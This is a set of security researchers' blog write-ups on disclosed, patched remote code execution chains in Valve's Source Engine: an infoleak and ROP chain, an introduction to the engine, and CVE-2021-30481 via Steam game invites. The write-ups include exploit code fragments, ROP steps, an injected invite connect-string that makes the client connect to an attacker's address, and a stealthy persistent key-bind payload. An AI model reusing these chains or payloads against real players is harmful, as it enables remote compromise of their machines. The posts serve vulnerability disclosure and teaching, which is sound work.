    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is determined by a signed comparison. What happens when totalBytes is negative? That makes it fully pass the length check.

If we are able to hack a file into the ZIP structure with a negative length, the engine will now happily upload to the server.

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read contents of the file in 0x100 sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading out the data to a temporary buffer on stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer). The networking code will indefinitely send chunks to the server by allocating 0x100 of stack space and calling ->Read(). But, when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data to the stack as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent Anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue to send fragments indefinitely as the “file size” is too large to ever be sent successfully.

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{0....p.h@...
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

97 27 b3 7b
0a a4 bc 7b
05 b9 00 7c
05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (0xE4) therefore it was easily selectable from the list of DWORDS. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it a label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}

The Final Chain + RCE!

After successfully developing the infoleak, now we have both a pointer leak and an arbitrary execute bug. These two are sufficient enough for us to craft a ROP chain and pop that sweet sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.
Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length
The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.
The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.
The server script builds a fake vtable pointer on the target client instance by replicating a ConVar onto the client. This is used to build a fake vtable on the client with a pointer to the fake vtable in a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.
The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.
The script again replicates the ConVar sv_downloadurl onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll so the pointer sv_download_url->m_pszString is now at an attacker known location.
The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.
Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value will exploit the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the pointer return value to instead be a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 4. This object pointer will redirect execution by pretending to be an IClientNetworkable* object and redirect the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 7.
Lastly, to execute the ROP chain and achieve RCE, the g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 4. The ROP chain then begins execution. The chain will load necessary arguments to call ShellExecuteA, then execute whatever program path we replicated onto sv_downloadurl given in Step 6. In this case, it is used to execute winver.exe for proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the users files and data.

And there you have it. This entire exploitation happens automatically, and does so by using Frida to inject into the dedicated server process to instrument to do all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action, be sure to full screen it so it’s easier to see:

Disclosure Timeline

[2020-05-13] Reported to Valve through HackerOne
[2020-05-18] Bug triaged
[2021-04-28] Notification that the bugs were fixed in Beta
[2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

But sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. I have also been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this, it is entirely command line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and its networking protocol it uses is magnitudes more complex than that of Source. There hasn’t been too much research done in the public on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam running creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Exploiting the Source Engine (Part 1)

Reversing Engineering for the Soul

2 August 2018 at 00:00

Introduction

It’s been a long time coming, but here’s my first post on a series about finding and exploiting bugs in Valve Software’s Source Engine. I was first introduced to it through the sandbox game Garry’s Mod in 2010, which introduced me to the field of reverse engineering and paved the way for my favorite hobby, my education, and my eventual employment.

I took a long hiatus from working with the Source Engine when I went to college and got involved obsessed with playing CTF competitions, a type of competition where participants solve challenges that mimic real-world reverse engineering and exploitation tasks. One day, I saw a post made about a TF2 RCE proof-of-concept released against the engine. To be honest, the bug and the exploit was very simple, and nothing more difficult than some of the intermediate challenges one would find in a good CTF. With that knowledge under my belt, I decided to prove myself and come back to the Source Engine with the goal of finding a true Remote Code Execution (RCE).

As it turns out, this was around the time that Valve released their Bug Bounty program through HackerOne, where they boasted a bounty range of $1,000 - $25,000 for these kind of bugs. With a bit of luck, I successfully found and wrote a proof-of-concept for a critical Server to Client RCE bug, and was given a generous bounty of $15,000 from Valve. Everything in this series is dedicated to information I’ve learned along the way about the engine.

NOTE: As of writing, the vulnerability has not been publicly disclosed. I will be doing a writeup of the bug and exploit chain if/when it goes public.


Source games Dota 2, CS:GO, and TF2 continue to hold top active player counts on Steam.

The Source Engine

The Source Engine is a third generation derivative of the famous Quake Engine from 1999 and the Valve’s own GoldSrc engine (the HL1 engine). The engine itself has been used to create some of the most famous FPS game series’ in history, including Half-Life, Team Fortress, Portal, and Counter Strike.

Timeline:

1998 - Valve showcases GoldSrc, a heavily modified Quake engine.
2004 - Valve releases the Source Engine based on GoldSrc.
2007 - The source code to the Source Engine is leaked.
2012 - CS:GO is released, and with it, “Source 1.5” begins development.
2013 - Valve releases the public 2013 SDK for the TF2/CS:S engine containing most of the code necessary to write games for the engine.
2015 - The “Reborn” update for Dota 2 brings the first Source 2 game to market.
2018 - Valve opens their HackerOne program to the public.

The Code:

The first thing that I didn’t truly appreciate about this engine (and other engines in general) is how large it is. The engine is gigantic, featuring millions of lines of C++ code to develop, render, and run games of all types (but mostly first-person games).

The code itself is old and unmaintained. Most of the code was very obviously rushed out to meet deadlines, and honestly it is a huge surprise that the engine even functions at all. This is not unique to Valve, and is very typical in the game development world.

Assets such as models, particles, and maps are all built and run using custom file formats developed by Valve or extended from Quake (yes, file format parsers from 1999). There are still usages of obviously unsafe functions such as strcpy and sprintf, and in general the engine itself has a history of “add, add, add” and very little maintenance.

A lot of the C++ classes included in the engine are straight up dead code. Big features were designed and developed, yet only used for very small parts of the engine. The 2013 SDK tools themselves still have difficulty building valid files for their current engine versions of the engine. Classes derive from anywhere from one to nine or more different base classes, and tend to feature a never-ending maze of abstractions on abstractions. Navigating this codebase is time consuming and generally unpleasant for beginners. All in all, the engine is due for a legacy code rewrite that will likely never happen.

Intro to Source Games:

Source Engine games consists of two separate parts, the engine and the game.

The engine consists of all of the typical game engine features like rendering, networking, the asset loaders for models and materials, and the physics engine. When I refer to the Source Engine, I am referring to this part of the game. The bulk of the engine’s code is found in engine.dll, which is found in the path /bin/engine.dll from the game’s root. This same base code is used in some manner across all SE games, and is typically utilized by 3rd party game developers in its pre-compiled form. The code for the Source Engine was leaked (luckily) as part of the 2007 Valve leak, and this leak is all the code that is available to the public for the engine.

The second part, the game, consists of two main parts, client.dll and server.dll. These binaries contain the compiled game that will use the engine. Both of these dlls will utilize engine.dll heavily in order to function. Inside of client.dll, you will find the code responsible for the GUI subsystem (named VGUI) of the game and the clientside logic of the actual game itself. Inside of server.dll, you will find all of the code to communicate the game’s serverside logic to the remote player’s client.dll. Both of these dlls are found in /[gamedir]/bin/*.dll, where [gamedir] is the game abbreviation (csgo, tf2, etc.).

Both the server and client have shared code that defines the entities of the game and variables that will be synchronized. Shared code is compiled directly into each binary, but some C macro design ensures that only the server parts compile to server.dll, and vice-versa. The engine.dll entity system will synchronize the server’s simulation of the game, and the client’s dll will take these simulations and display them to the player through the engine.dll renderer.

Lastly, a big feature of all Source games that was taken and evolved from the Quake engine is the ConVar system. This system defines a series of variables and commands that are executed on an internal command line, very similar to a cmd.exe or /bin/sh shell. The difference is that, instead of executing new processes, these commands will run functions on either the client or server depending on where its run. The engine defines some low-level ConVars found on both the server and client, while the game dlls add more on top of that depending on the game dll that’s running.

A Console Variable (ConVar) takes the form of <name> <value>, where the value can be numerical or string based. Typically used for configuration, certain special ConVars will be synchronized. The server can always request the value of a client’s ConVar. Example: sv_cheats 1 sets the ConVar sv_cheats to 1, which enables cheats.
A Console Command (ConCommand) takes the form of <name> <arg0> <arg1> …, and defines a command with a backing C++ function that can be run from the developer console. Sometimes, it is used by the game or the engine to run remote functions (client -> server, server -> client). Example: changelevel de_dust executes the command changelevel with the argument de_dust, which changes the current map when run on the server console.

This is just an intro, more on all of this to follow in future posts.

The Bugs:

All of this old code and custom formats is fantastic for a bug hunter. In 2018, all that’s truly necessary to perform a full chain RCE is a good memory corruption bug to take control and an information leak to bypass ASLR. Typically, the former is the most difficult part of bug hunting in modern software, but later you will see that, for the SE, it is actually the latter.

Here is an overview of the Windows binaries:

32-bit binaries
NX - Enabled
Full ASLR - Enabled (recently)
Stack Cookies - Disabled (in the cases it matters)

If you’re an exploit developer, you would probably find the lack of stack cookies in a game engine with millions of players to be a very shocking discovery. This is a vital shortcoming of the already aging engine, and is essentially unheard of in modern Windows binaries. Valve is well aware of this protection’s existence, and has chosen time and time again not to enable it. I have some speculation as to why this is not enabled (most likely performance or build breaking issues), but regardless, there is a huge point to make: Any controllable stack overflow can overwrite the instruction pointer and divert code execution.

Considering how much the stack is used in this engine, this is a huge benefit to bug hunters. One simple out-of-bounds (OOB) string copy, such as a call to strcpy, will result in swift compromise of the instruction pointer straight into RCE. My first bug, unsurprisingly, is a stack overflow bug, not much different than you would find in a beginner level CTF challenge. But, unlike the CTF, its implications of a full client machine compromise in a series of games with a huge player base leads to the large payout.

Hunting:

When hunting for these bugs, I chose to take a slightly more difficult path of only performing manual code auditing on the publicly available engine code. What this allows me to do is both search for potentially useful bugs and also learn the engine’s internals along the way. While it might be enticing for me to just fuzz a file format and get lots of crashes, fuzzing tends to find surface level bugs that everyone’s finding, and never those really deep, interesting bugs that no one is finding.

As I said previously, the codebase for this engine is gigantic. You should take advantage of all of the tools available to you when searching. My preferred toolset is this:

Following code structure and searches using Visual Studio with Resharper++.
Cmder (with grep) to search for patterns.
IDA Pro to prove the existence of the bug in the newest build.
WinDbg and x64dbg to attach to the game and try to trigger the bug.
Sourcemod extensions to modify the server for proof-of-concepts

With these tools, my general “process” for bug hunting is this:

Find some section of the client code I feel is exploitable and want to look into more closely
Start reading code. I’ll read for hours until I come across what I think is a possible exploitable bug.
From there, I will open up IDA Pro and locate the function I think is exploitable, then compare its current code with the old, public code I have available.
If it still appears to be exploitable, I will try to find some method to trigger the exploitable function from in-game. This turns out to be one of the hardest parts of the process, because finding a triggerable path to that function is a very difficult task given the size of the engine. Sometimes, the server just can’t trigger the bug remotely. Some familiarity with the engine goes a long way here.
Lastly, I will write Sourcemod plugins that will help me trigger it from a game server to the client, hoping to finally prove the existence of the bug and the exploitability in a proof-of-concept.

Next Time

Next post, I will go more in-depth into the codebase of the Engine and explain the entity and networking system that the Engine utilizes to run the game itself. Also, I will begin introducing some of the techniques I used to write the exploits, including the ASLR and NX bypass. There’s a whole lot more to talk about, and this post barely scratches the service. At the moment, I’m in the process of working on a new undisclosed bug in the engine. Hoping to turn this one into another big payout. Wish me luck!

— Gbps

secret club
CVE-2021-30481: Source engine remote code execution via game invitesfloesen
20 April 2021 at 00:00

CVE-2021-30481: Source engine remote code execution via game invites

secret club

By: floesen

20 April 2021 at 00:00

Steam is the most popular PC game launcher in the world. It gives millions of people the chance to play their favorite video games with their friends using the built in friend and party system, so it’s safe to assume most users have accepted an invite at one point or another. There’s no real danger in that, is there?

In this blog post, we will look at how an attacker can use the Steamworks API in combination with various features and properties of the Source engine to gain remote code execution (RCE) through malicious Steam game invites.

Why game invites do more than you think they do

The Steamworks API allows game developers to access various Steam features from within their game through a set of different interfaces. For example, the ISteamFriends interface implements functions such as InviteUserToGame and ReplyToFriendMessage, which, as their names suggest, let you interact with your friends either by inviting them to your game or by just sending them a text message. How can this become a problem?

Things become interesting when looking at what InviteUserToGame actually does to get a friend into your current game/lobby. Here, you can see the function prototype and an excerpt of the description from the official documentation:

bool InviteUserToGame( CSteamID steamIDFriend, const char *pchConnectString );

“If the target user accepts the invite then the pchConnectString gets added to the command-line when launching the game. If the game is already running for that user, then they will receive a GameRichPresenceJoinRequested_t callback with the connect string.”

Basically, that means that if your friends do not already have the game started, you can specify additional start parameters for the game process, which will be appended at the end of the command line. For regular invites in the context of, e.g., CS:GO, the start parameter +connect_lobby in combination with your 64-bit lobby ID is appended. This very command, in turn, is executed by your in-game console and eventually gets you into the specified lobby. But where is the problem now?

When specifying console commands in the start parameters of a Source engine game, you are not given any limitations. You can arbitrarily execute any game command of your choice. Here, you can now give free rein to your creativity; everything you can configure in the UI and much more beyond that can generally be tweaked with using console commands. This allows for funny things as messing with people’s game language, their sensitivity, resolution, and generally everything settings-related you can think of. In my opinion, this is already quite questionable but not extremely malicious yet.

Using console commands to build up an RCON connection

A lot of Source engine games come with something that is known as the Source RCON Protocol. Briefly summarized, this protocol enables server owners to execute console commands in the context of their game servers in the same manner as you would typically do it to configure something in your game client. This works by prefixing any console command with rcon before executing it. In order to do so, this requires you to previously connect and authenticate yourself to the game server using the rcon_address and rcon_password commands. You might already know where this is going… An attacker can execute the InviteUserToGame function with the second parameter set to "+rcon_address yourip:yourport +rcon". As soon as the victims accept the invite, the game will start up and try to connect back to the specified address without any notification whatsoever. Note that the additional +rcon at the end is required because the client does not initiate the connection until there is an attempt to actually communicate to the server. All of this is already very concerning as such invites inherently leak the victim’s IP address to the attacker.

Abusing the RCON connection

A further look into how the Source engine implements RCON on the client-side reveals the full potential. In CRConClient::ParseReceivedData, we can see how the client reacts to different types of RCON packets coming from the server. Within the scope of this work, we only look at the following three types of packets: SERVERDATA_RESPONSE_STRING, SERVERDATA_SCREENSHOT_RESPONSE, and SERVERDATA_CONSOLE_LOG_RESPONSE. The following image ¹ shows how RCON packets look like in general. The content delivered by the packet starts with the Body member and is typically null-terminated with the Empty String field.

Now, starting with the first type, it allows an attacker hosting a malicious RCON server to print arbitrary strings into the connected victim’s game console as long as the RCON connection remains open. This is not related to the final RCE, but it is too funny to just leave it out. Below, there is an example of something that would certainly be surprising to anybody who sees it popping up in their console.

Let’s move on to the exciting part. To simplify matters, we will only explain how the client handles SERVERDATA_SCREENSHOT_RESPONSE packets as the code is almost exactly the same for SERVERDATA_CONSOLE_LOG_RESPONSE packets. Eventually, the client treats the packet data it receives as a ZIP file and tries to find a file with the name screenshot.jpg inside. This file is then subsequently unpacked to the root CS:GO installation folder. Unfortunately, we cannot control the name under which the screenshot is saved on the disk nor can we control the file extension. The screenshot is always saved as screenshotXXXX.jpg where XXXX represents a 4-digit suffix starting at 0000, which is increased as long as a file with that name already exists.

void CRConClient::SaveRemoteScreenshot( const void* pBuffer, int nBufLen )
{
	char pScreenshotPath[MAX_PATH];
	do 
	{
		Q_snprintf( pScreenshotPath, sizeof( pScreenshotPath ), "%s/screenshot%04d.jpg", m_RemoteFileDir.Get(), m_nScreenShotIndex++ );	
	} while ( g_pFullFileSystem->FileExists( pScreenshotPath, "MOD" ) );

	char pFullPath[MAX_PATH];
	GetModSubdirectory( pScreenshotPath, pFullPath, sizeof(pFullPath) );
	HZIP hZip = OpenZip( (void*)pBuffer, nBufLen, ZIP_MEMORY );

	int nIndex;
	ZIPENTRY zipInfo;
	FindZipItem( hZip, "screenshot.jpg", true, &nIndex, &zipInfo );
	if ( nIndex >= 0 )
	{
		UnzipItem( hZip, nIndex, pFullPath, 0, ZIP_FILENAME );
	}
	CloseZip( hZip );
}

Note that an attacker can send these kinds of RCON packets without the client requesting anything prior. Already, an attacker can upload arbitrary files if the victim accepts the game invite. So far, there is no memory corruption required yet.

Integer underflow in FindZipItem leads to remote code execution

The functions OpenZip, FindZipItem, UnzipItem, and CloseZip belong to a library called XZip/XUnzip. The specific version of the library which is used by the RCON handler dates back to 2003. While we found several flaws in the implementation, we will only focus on the first one that helped us get code execution.

As soon as CRConClient::SaveRemoteScreenshot calls FindZipItem to retrieve information about the screenshot.jpg file inside the archive, TUnzip::Get is called. Inside TUnzip::Get, the archive is parsed according to the ZIP file format. This includes processing the so-called central directory file header.

int unzlocal_GetCurrentFileInfoInternal (unzFile file, unz_file_info *pfile_info,
   unz_file_info_internal *pfile_info_internal, char *szFileName,
   uLong fileNameBufferSize, void *extraField, uLong extraFieldBufferSize,
   char *szComment, uLong commentBufferSize)
{
	// ...
	s=(unz_s*)file;
	// ...
	if (unzlocal_getLong(s->file,&file_info_internal.offset_curfile) != UNZ_OK)
		err=UNZ_ERRNO;
	// ...
}

In the code above, the relative offset of the local file header located in the central directory file header is read into file_info_internal.offset_curfile. This allows to locate the actual position of the compressed file in the archive, and it will play a key role later on.

Somewhere later in TUnzip::Get, a function with the name unzlocal_CheckCurrentFileCoherencyHeader is called. Here, the previously mentioned local file header is now processed given the offset that was retrieved before. This is what the corresponding code looks like:

int unzlocal_CheckCurrentFileCoherencyHeader (unz_s *s,uInt *piSizeVar,
   uLong *poffset_local_extrafield, uInt  *psize_local_extrafield)
{
	// ...
	if (lufseek(s->file,s->cur_file_info_internal.offset_curfile + s->byte_before_the_zipfile,SEEK_SET)!=0)
		return UNZ_ERRNO;


	if (err==UNZ_OK)
		if (unzlocal_getLong(s->file,&uMagic) != UNZ_OK)
			err=UNZ_ERRNO;
	// ...
}

At first, a call to lufseek sets the internal file pointer to point to the local file header in the archive (here, it can be assumed that there are no additional bytes in front of the archive).

From this assumption it follows that s->byte_before_the_zipfile is 0.

This is very similar to how dealing with files works in the C standard library. In our specific case, the RCON handler opened the ZIP archive with the ZIP_MEMORY flag, thus specifying that the archive is essentially just a byte blob in memory. Therefore, calls to lufseek only update a member in the file object.

int lufseek(LUFILE *stream, long offset, int whence)
{
	// ...
	else
	{ 
		if (whence==SEEK_SET) stream->pos=offset;
		else if (whence==SEEK_CUR) stream->pos+=offset;
		else if (whence==SEEK_END) stream->pos=stream->len+offset;
		return 0;
	}
}

Once lufseek returns, another function with the name unzlocal_getLong is invoked to read out the magic bytes that identify the local file header. Internally, this function calls unzlocal_getByte four times to read out every single byte of the long value. unzlocal_getByte in turn calls lufread to directly read from the file stream.

int unzlocal_getLong(LUFILE *fin,uLong *pX)
{
	uLong x ;
	int i = 0;
	int err;

	err = unzlocal_getByte(fin,&i);
	x = (uLong)i;

	if (err==UNZ_OK)
		err = unzlocal_getByte(fin,&i);
	x += ((uLong)i)<<8;

	// repeated two more times for the remaining bytes
	// ...
	return err;
}

int unzlocal_getByte(LUFILE *fin,int *pi)
{
	unsigned char c;
	int err = (int)lufread(&c, 1, 1, fin);
	// ...
}

size_t lufread(void *ptr,size_t size,size_t n,LUFILE *stream)
{
	unsigned int toread = (unsigned int)(size*n);
	// ...
	if (stream->pos+toread > stream->len) toread = stream->len-stream->pos;
	memcpy(ptr, (char*)stream->buf + stream->pos, toread); DWORD red = toread;
	stream->pos += red;
	return red/size;
}

Given the fact that s->cur_file_info_internal.offset_curfile can be arbitrarily controlled by modifying the corresponding field in the central directory structure, the stack can be smashed in the first call to lufread right on the spot. If you set the local file header offset to 0xFFFFFFFE a chain of operations eventually leads to code execution.

First, the call to lufseek in unzlocal_CheckCurrentFileCoherencyHeader will set the pos member of the file stream to 0xFFFFFFFE. When unzlocal_getLong is called for the first time, unzlocal_getByte is also invoked. lufread then tries to read a single byte from the file stream. The variable toread inside lufread that determines the amount of memory to be read will be equal to 1 and therefore the condition if (stream->pos + toread > stream->len) (unsigned comparison) becomes true. stream->pos + toread calculates 0xFFFFFFFE + 1 = 0xFFFFFFFF and thus is likely greater than the overall length of the archive which is stored in stream->len. Next, the toread variable is updated with stream->len - stream->pos which calculates stream->len - 0xFFFFFFFE. This calculation underflows and effectively computes stream->len + 2. Note how in the call to memcpy the calculation of the source parameter overflows simultaneously. Finally, the call to memcpy can be considered equivalent to this:

memcpy(ptr, (char*)stream->buf - 2, stream->len + 2);

Given that ptr points to a local variable of unzlocal_getByte that is just a single byte in size, this immediately corrupts the stack.

unzlocal_getByte calls lufread(&c, 1, 1, fin) with c being an unsigned char.

Luckily, the memcpy call writes the entire archive blob to the stack, enabling us to also control the content of what is written.

At this point, all that is left to do is constructing a ZIP archive that has the local file header offset set to 0xFFFFFFFE and otherwise primarily consists of ROP gadgets only. To do so, we started with a legitimate archive that contains a single screenshot file. Then, we proceeded to corrupt the offset as mentioned above and observed where to put the gadgets at based on the faulting EIP value. For the ROP chain itself, we exploited the fact that one of the DLLs loaded into the game called xinput1_3.dll has ASLR disabled. That being said, its base address can be somewhat reliably guessed. The exploit only ever fails when its preferred address is already occupied by another DLL. Without doing proper statistical measurements, the probability of the exploit to work is estimated to be somewhere around 80%. For more details on this, feel free to check out the PoC, which is linked in the last section of this article.

Advancing the RCE even more

Interestingly, at the very end, you can once again see how this exploit benefits from the start parameter injection and the RCON capabilities.

Let’s start with the apparent fact that the arbitrary file upload, which was discussed previously, greatly helps this exploit to reach its full potential. One shellcode to rule them all or in other words: Whether you want to execute the calculator or a malicious binary you previously uploaded, it really does not matter. All that needs to be done is changing a single string in the exploit shellcode. It does not matter if your binary has been saved with the .png extension.

Finally, there is still something that can be done to make the exploit more powerful. We cannot change the fact that the exploit attempts fail from time to time due to bad luck with the base addresses, but what if we had unlimited tries to attempt the code execution? Seems unreasonable? It actually is very reasonable.

The Source engine comes with the console command host_writeconfig that allows us to write out the current game configuration to the config file on the disk. Obviously, we can also inject this command using game invites. Right before doing that, however, we can use bind to configure any key that is frequently pressed by players to execute the RCON connection commands from the very beginning. Bonus points if you make the keys maintain their original functionality to remain stealthy. Once we configured such a key, we can write out the settings to the disk so that the changes become persistent. Here is an example showing how the tab key can be stealthily configured to initiate an outgoing RCON connection each time it is pressed.

+bind "tab" "+showscores;rcon_address ip:port;rcon" +host_writeconfig

Now, after accepting just a single invite, you can try to run the exploit on your victims whenever they look at the scoreboard.

Also bind +showscores as that way tab keeps showing the scoreboard.

Timeline and final words

[2019-06-05] Reported to Valve on HackerOne
[2019-09-14] Bug triaged
[2020-10-23] Bounty paid ($8000) & notification that initial fix was deployed in Team Fortress 2
[2021-04-17] Final patch

